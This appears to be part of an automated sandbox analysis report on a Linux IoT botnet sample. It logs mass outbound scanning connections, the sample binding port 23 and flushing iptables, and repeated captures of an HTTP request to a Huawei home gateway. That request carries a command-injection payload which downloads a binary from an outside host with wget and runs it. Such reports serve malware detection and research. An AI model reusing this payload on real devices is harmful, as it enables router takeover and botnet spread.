              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.42.112.137:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.185.73.149:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.63.85.157:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.44.240.38:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.206.20.95:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.125.238.67:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.189.135.44:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.87.38.231:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.122.211.139:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.239.100.110:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.91.131.115:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.47.69.135:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.174.130.240:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.93.224.120:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.197.243.17:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.6.221.162:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.253.111.230:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.21.203.212:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.9.194.49:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.74.229.13:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.224.86.132:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.39.211.194:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.158.47.185:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.37.70.46:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.119.66.214:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.101.117.235:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.112.157.199:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.100.65.241:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.239.152.12:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.83.154.163:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.17.175.43:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.208.100.5:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.19.155.0:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.162.230.161:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.8.110.78:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.80.87.122:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.115.2.193:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.24.159.165:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.195.207.237:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.116.242.45:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.73.110.137:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.48.105.199:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.1.59.76:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.237.12.205:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.205.145.75:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.93.22.197:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.104.133.221:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.40.76.201:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.246.102.247:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.206.150.82:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.203.146.253:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.201.227.24:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.121.122.37:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.174.217.37:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.160.99.230:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.24.9.173:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.162.99.153:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.235.16.92:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.38.208.211:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.82.216.116:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.230.82.46:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.168.196.80:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.124.198.104:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.169.34.128:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.143.207.12:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.55.143.122:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.255.66.70:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.136.252.215:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.249.61.142:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.44.235.31:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.125.207.167:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.148.162.64:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.124.200.130:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.215.41.201:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.76.125.54:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.8.49.229:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.70.148.200:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.2.223.36:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.76.210.200:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.217.43.87:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.107.102.170:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.51.115.157:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.255.244.224:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.178.194.236:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.128.197.192:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.9.236.200:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.59.94.209:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.138.13.175:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.160.118.242:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.134.51.182:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.13.35.8:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.57.146.247:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.131.20.240:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.143.182.224:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.239.74.195:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.124.68.176:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.20.123.181:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.239.35.160:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.38.106.189:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.101.185.80:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.138.203.68:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.178.106.164:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.100.254.103:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.121.100.156:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.178.137.191:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.36.2.242:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.206.252.36:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.229.124.157:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 156.168.115.35:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 41.204.62.135:52869
              Source: global trafficTCP traffic: 192.168.2.23:24453 -> 197.203.208.50:52869
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.177.221.130:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.81.237.248:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.59.188.227:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 156.53.229.214:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.170.135.175:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 197.73.195.199:37215
              Source: global trafficTCP traffic: 192.168.2.23:21125 -> 41.237.11.121:37215
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 197.67.4.7:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 156.25.85.55:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 197.206.23.7:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 156.51.41.231:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 156.54.105.193:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 156.156.28.15:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 197.4.51.69:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 197.20.120.93:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 156.82.21.229:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 156.158.91.163:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 41.80.110.15:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 197.199.247.183:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 156.214.143.94:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 197.181.41.123:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 41.95.249.162:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 156.171.131.127:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 156.194.128.136:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 197.251.203.173:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 197.227.54.43:52869
              Source: global trafficTCP traffic: 192.168.2.23:21381 -> 41.156.32.208:52869
              Source: /tmp/arm7 (PID: 5249)Socket: 0.0.0.0::23
              Source: /usr/sbin/sshd (PID: 5365)Socket: 0.0.0.0::22
              Source: /usr/sbin/sshd (PID: 5365)Socket: [::]::22
              Source: /bin/sh (PID: 5310)Iptables executable: /sbin/iptables -> /sbin/iptables -F
              Source: /bin/sh (PID: 5311)Iptables executable: /sbin/iptables -> /sbin/iptables -X
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 